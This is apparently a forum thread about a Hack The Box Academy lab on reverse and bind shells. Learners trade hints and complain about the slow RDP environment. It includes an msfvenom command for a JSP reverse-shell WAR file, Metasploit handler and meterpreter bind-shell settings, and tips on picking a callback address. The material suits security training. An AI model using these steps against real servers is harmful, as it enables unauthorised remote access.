Reverse Shell & Payloads - The live engagement

I think your use the cat flag.txt, some time it will not work instant you use “type flag.txt”.

Could someone give me a nudge?

Im on question 2 still, been a few days but mainly cause I hate having to work inside this RDP environment.

Im logged into the tomcat manager with the creds provided and found on desktop, when I upload the war msfvenom payload, and then start a listener with msfconsole, and then browse to that new directory added after uploading the war payload.

It just loads to the page where the payload is and does not actually connect back to my listener.

Here is what ive been using so far

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4434 -f war > test.war

and then

msfconsole > use/multi/handler > java/jsp_shell_reverse_tcp > Started reverse TCP handler on 
 > run and wait

Any tips or nudges would be greatly appreciated.

Hey I’m stuck on the same spot. I can upload a webshell but am limited on commands. For example cannot run dir. I’ve tried the same reverse shell as you and have not had any luck. Have you figured it out?

I spent quite a lot of time with the last question (Host-03), turns out I didn’t read the instructions properly. For Host-03, the exploit is given in the hint, however, we need to set up both RHOSTS and LHOST. The clue for the LHOST is also given in the instructions.

use it as the attacking machine. to open firefox open a terminal and type firefox

1 Like

doublecheck your lhost, try ifconfig

1 Like

The environment you are put in is painfully slow. I can not see a reason for this. The content was easy but the env is terrible.

vhost should be blog.inlanefreight.local
rhost should be the ip address of the blog machine

set payload php/meterpreter/bind_tcp

The Academy HTB material covers the difference between reverse and bind shells, but doesn’t emphasize the importance enought. Whenever you are trying to access a host that’s behind an internal network, you will have more success with bind shells than reverse shells, since it is too hard for that host to find its way back to you on the network. Meterpreter will automatically connect to the bind shell once it is established.

One more thing I just realized…you actually can use a reverse shell payload IF:

you use the ip address on the foothold host that is on the same internal network as the target hosts. Remember, one host can have multiple interfaces, each with its own IP address.

In the command line, type “ip addr” and look for an IP address that has the same subnet (172.16.1.X) as the target hosts, and use that IP address as your LHOST in Metasploit.

Hey, let me know if you are able to solve this. I am stuck with same error

hey, have you figured out how to do this? I’m stuck like you and I’d like some help.

this rdp is so baddddd
wtf keep disconnectiong so slow killing the fun i was so hyped but i surrprised by this bad performance i hated this last exercices

1 Like

Is there a way to find the credentials without reading the hint on the second host?


First thing i notice about your payload is the Lhost, it looks like you are using your pwnbox IP, you need to use the IP of the RDPd machine, mine was 172.x.x.x, also what helped me through this was google search, Apache Tomcat Manager .war reverse shell | VK9 Security

Enter “firefox” without quotes in terminal, it will start firefox

1 Like

This is the most annoying challenge… The lab is so slow that at one point you just feel like slamming your pc to the ground… HackTheBox Academy if you are reading this… PLEASE FOR GODS SAKE DONT LET US RDP INTO SOME OTHER MACHINE TO SOLVE A GODAMNN CHALLENGE

1 Like

Thanks for helping

how the heck did you solve the first section?

did you guys solve it?